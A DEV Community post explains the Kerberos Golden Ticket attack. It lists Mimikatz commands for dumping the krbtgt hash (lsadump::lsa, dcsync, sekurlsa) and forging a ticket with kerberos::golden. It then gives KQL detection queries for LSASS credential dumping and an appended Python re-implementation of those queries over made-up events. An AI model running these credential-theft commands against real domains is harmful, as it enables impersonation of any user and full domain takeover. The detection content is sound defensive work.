DEV Community

Puneet Jena

Golden Ticket Attack: Forging Kerberos Tickets with Mimikatz

A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) generated using the krbtgt account hash from Active Directory. With it, attackers can impersonate any user (even Domain Admins) and access any service in the domain.

  1. Launch Mimikatz: .\mimikatz.exe

  2. Enable debug privileges: privilege::debug

  3. Dump the krbtgt account hash: lsadump::lsa /inject /name:krbtgt

     lsadump::lsa is just one way. Mimikatz provides multiple methods to obtain credentials for Golden Ticket creation, such as:

     • lsadump::dcsync → replicates account data directly from a DC.
     • sekurlsa::logonpasswords → extracts credentials from LSASS in memory.
     • sekurlsa::minidump → loads a dumped LSASS process memory file for offline credential extraction.

  4. Create the Golden Ticket: kerberos::golden /user:Administrator /domain: /sid: /krbtgt: /id:500

Defender Detection Ideas

https://attack.mitre.org/techniques/T1558/001/

Suspicious LSASS Parent Processes & Command Lines:

DeviceProcessEvents
| where FileName contains "lsass.exe"
| summarize count() by InitiatingProcessFileName

DeviceProcessEvents
| where ProcessCommandLine contains "lsass.exe"
| where
    // --- Mimikatz module usage ---
    ProcessCommandLine has_any ("sekurlsa", "minidump", "lsass.dmp")
    // --- ProcDump dumping LSASS ---
    or ProcessCommandLine has_any ("procdump", "-ma", "lsass.dmp")
    // --- Rundll32 with comsvcs.dll to dump LSASS ---
    or ProcessCommandLine has "comsvcs.dll"
    // --- PowerShell invoking Mimikatz ---
    or ProcessCommandLine has "Invoke-Mimikatz"
| project
    Timestamp,
    DeviceName,
    FileName,
    ProcessCommandLine,
    InitiatingProcessAccountName,
    InitiatingProcessParentFileName
| order by Timestamp desc
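As an added example (not code from the post), here are the two detection queries above re-implemented in Python over a handful of constructed DeviceProcessEvents rows, so the logic can be exercised offline before it goes into a hunting workbook. Column names follow the Defender for Endpoint schema the queries use; the hostnames, accounts, timestamps and command lines are made up. It goes one step beyond the post's rule in two ways: each hit reports which indicator group fired, and a wider variant is available that drops the `contains "lsass.exe"` prefilter, because the second query as written never reaches a command line that names a Mimikatz module or Invoke-Mimikatz without also containing the string lsass.exe. The extra indicator group built from the walkthrough's own commands (privilege::debug, lsadump::, kerberos::golden) is an assumption of this example, not part of the post's query.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    """One DeviceProcessEvents row (only the columns the two queries touch)."""
    timestamp: str
    device_name: str
    file_name: str
    process_command_line: str
    initiating_process_file_name: str
    initiating_process_account_name: str
    initiating_process_parent_file_name: str


# Indicator groups, one per commented clause of the post's second query.
PAGE_INDICATORS: Dict[str, Tuple[str, ...]] = {
    "mimikatz_module": ("sekurlsa", "minidump", "lsass.dmp"),
    "procdump": ("procdump", "-ma", "lsass.dmp"),
    "comsvcs": ("comsvcs.dll",),
    "invoke_mimikatz": ("Invoke-Mimikatz",),
}
# Assumption, not part of the post's query: also match the Mimikatz commands
# that the walkthrough above runs.
EXTRA_INDICATORS: Dict[str, Tuple[str, ...]] = {
    "golden_ticket_steps": ("privilege::debug", "lsadump::", "kerberos::golden"),
}
ALL_INDICATORS = {**PAGE_INDICATORS, **EXTRA_INDICATORS}


def match_reasons(command_line: str, groups: Dict[str, Tuple[str, ...]]) -> List[str]:
    """Names of every indicator group that fires on a command line.
    KQL has/has_any match whole terms case-insensitively; a case-insensitive
    substring match is used here, which is slightly broader ("-ma" also hits
    "-management", for instance)."""
    text = command_line.lower()
    return [name for name, terms in groups.items()
            if any(term.lower() in text for term in terms)]


def lsass_parent_summary(events: List[ProcessEvent]) -> Dict[str, int]:
    """First query: lsass.exe process starts counted per initiating process.
    On a healthy host only wininit.exe starts lsass.exe, so any other parent
    points at a binary that is merely named lsass.exe."""
    counts: Dict[str, int] = {}
    for e in events:
        if "lsass.exe" in e.file_name.lower():  # KQL `contains` is case-insensitive
            parent = e.initiating_process_file_name
            counts[parent] = counts.get(parent, 0) + 1
    return counts


def commandline_matches(events: List[ProcessEvent], groups=PAGE_INDICATORS,
                        require_lsass_in_cmdline: bool = True) -> List[dict]:
    """Second query. With the defaults it behaves exactly as written: the
    `contains "lsass.exe"` prefilter runs first, so a command line that names a
    Mimikatz module but never mentions lsass.exe is skipped. Pass
    require_lsass_in_cmdline=False and groups=ALL_INDICATORS for the wider variant."""
    rows = []
    for e in events:
        if require_lsass_in_cmdline and "lsass.exe" not in e.process_command_line.lower():
            continue
        reasons = match_reasons(e.process_command_line, groups)
        if reasons:
            rows.append({  # the query's `project` clause, plus why it fired
                "Timestamp": e.timestamp,
                "DeviceName": e.device_name,
                "FileName": e.file_name,
                "ProcessCommandLine": e.process_command_line,
                "InitiatingProcessAccountName": e.initiating_process_account_name,
                "InitiatingProcessParentFileName": e.initiating_process_parent_file_name,
                "Reasons": reasons,
            })
    return sorted(rows, key=lambda r: r["Timestamp"], reverse=True)  # order by Timestamp desc


# Constructed sample rows: hostnames, users, timestamps and command lines are made up.
SAMPLE_EVENTS = [
    ProcessEvent("2024-05-01T08:00:00Z", "WS01", "lsass.exe",
                 r"C:\Windows\system32\lsass.exe", "wininit.exe", "SYSTEM", "smss.exe"),
    ProcessEvent("2024-05-01T09:15:00Z", "WS01", "lsass.exe",
                 r"C:\Users\j.doe\Downloads\lsass.exe", "cmd.exe", "j.doe", "explorer.exe"),
    ProcessEvent("2024-05-01T09:20:00Z", "WS01", "procdump64.exe",
                 r"procdump64.exe -accepteula -ma lsass.exe C:\temp\lsass.dmp",
                 "cmd.exe", "j.doe", "explorer.exe"),
    ProcessEvent("2024-05-01T09:25:00Z", "WS01", "rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\comsvcs.dll ... C:\temp\lsass.dmp",
                 "cmd.exe", "j.doe", "explorer.exe"),
    ProcessEvent("2024-05-01T09:30:00Z", "WS01", "powershell.exe",
                 "powershell.exe -nop -c Invoke-Mimikatz -Command sekurlsa::logonpasswords",
                 "cmd.exe", "j.doe", "explorer.exe"),
    ProcessEvent("2024-05-01T09:40:00Z", "DC01", "mimikatz.exe",
                 'mimikatz.exe "privilege::debug" "lsadump::lsa /inject /name:krbtgt" exit',
                 "cmd.exe", "da.admin", "explorer.exe"),
]

if __name__ == "__main__":
    print("lsass.exe parents:", lsass_parent_summary(SAMPLE_EVENTS))
    print("as written:", [(r["FileName"], r["Reasons"]) for r in commandline_matches(SAMPLE_EVENTS)])
    print("extended:", [(r["FileName"], r["Reasons"]) for r in
                        commandline_matches(SAMPLE_EVENTS, ALL_INDICATORS, False)])
```

Run against the sample rows, the parent summary shows lsass.exe started once by wininit.exe (normal) and once by cmd.exe (a lookalike binary in a user's Downloads folder), while the rule as written fires only on the ProcDump row, since it is the only one whose command line contains lsass.exe; the wider variant also catches the comsvcs.dll, Invoke-Mimikatz and mimikatz.exe rows. The `Reasons` column is what an analyst needs in the alert: it says which clause matched, which is what decides whether a hit is triaged as a dump tool, a Mimikatz invocation or a known-good admin utility that happens to share a substring.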
